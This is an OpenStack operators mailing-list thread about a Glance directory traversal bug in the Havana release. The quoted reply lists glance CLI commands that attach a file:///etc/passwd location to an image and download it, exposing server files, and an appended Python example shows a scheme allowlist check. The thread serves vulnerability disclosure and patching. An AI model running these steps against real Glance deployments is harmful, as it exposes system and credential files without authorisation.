[Openstack-operators] glance directory traversal bug and havana

George Shuklin george.shuklin at gmail.com
Fri Jan 9 17:10:19 UTC 2015


Seems I was wrong.

Thanks, I'll look at it again.

On 01/08/2015 07:37 PM, Jesse Keating wrote:
> On 1/7/15 8:47 PM, George Shuklin wrote:
>> I spent a few hours trying to backport to Havana, but then I found that
>> Havana seems to be immune to the bug. I'm not 100% sure, so someone else is
>> advised to look too.
>>
>> The bug was that Icehouse+ accepts all supported schemes. The fix excludes
>> 'bad' schemes. Havana, though, has an explicitly given list of accepted
>> schemes for the location field, and 'bad' schemes are not in it.
>>
>
> Havana is certainly not immune. I was able to fetch content from the 
> system fairly easily.
>
> Start with an updated glance client
>
> Modify it as listed in 
> https://bugs.launchpad.net/glance/+bug/1400966/comments/6
>
> $ glance image-create --disk-format raw --container-format bare
>
> $ glance image-update --size 700 <image_id>
>
> $ glance --os-image-api-version 2 location-add --url file:///etc/passwd
>
> $ glance image-download <image_id>
>
>
> That got me (some of) the contents of /etc/passwd.
>
> The patch I posted prevented this from happening. It blocks adding a 
> location that is file:// based, but still allows other location adds 
> that should be allowed.
>
> https://github.com/blueboxgroup/glance/commit/7ab98b72802de1d5695d35306e32293463977496 
>
>
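
The location scheme check discussed in this thread, sketched as an allowlist. This is an added example, not Glance code or the linked patch; `validate_location_url`, `ALLOWED_SCHEMES` and the sample URLs are hypothetical and constructed for illustration.

```python
from urllib.parse import urlsplit

# Assumption: this deployment only needs remote HTTP(S) image locations.
ALLOWED_SCHEMES = frozenset({"http", "https"})


class LocationRejected(ValueError):
    """Raised when a user-supplied image location must not be stored."""


def validate_location_url(url, allowed=ALLOWED_SCHEMES):
    """Return the normalized scheme if the location is acceptable, else raise."""
    if not isinstance(url, str) or not url.strip():
        raise LocationRejected("empty location")
    try:
        parts = urlsplit(url.strip())
    except ValueError as exc:  # e.g. malformed bracketed host
        raise LocationRejected("unparseable location: %s" % exc)
    # Compare the normalized scheme, never a raw string prefix, so that
    # case variants of a blocked scheme are treated the same way.
    scheme = parts.scheme.lower()
    if scheme not in allowed:
        raise LocationRejected("scheme %r not permitted" % scheme)
    if not parts.netloc:
        raise LocationRejected("location has no host")
    return scheme


def check_all(urls):
    """Map each URL to True (accepted) or False (rejected)."""
    verdicts = {}
    for url in urls:
        try:
            validate_location_url(url)
            verdicts[url] = True
        except LocationRejected:
            verdicts[url] = False
    return verdicts


# Constructed sample inputs, including the location from the thread.
SAMPLES = ["https://images.example.org/cirros.raw", "file:///etc/passwd",
           "FILE:///etc/passwd", "/etc/passwd", "http:///no-host.raw"]

if __name__ == "__main__":
    for url, ok in check_all(SAMPLES).items():
        print("%-40s %s" % (url, "accepted" if ok else "rejected"))
```

An allowlist fails closed: a store scheme added later is rejected until someone decides it is safe for user-supplied locations, whereas a denylist has to be kept in step with every new backend.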



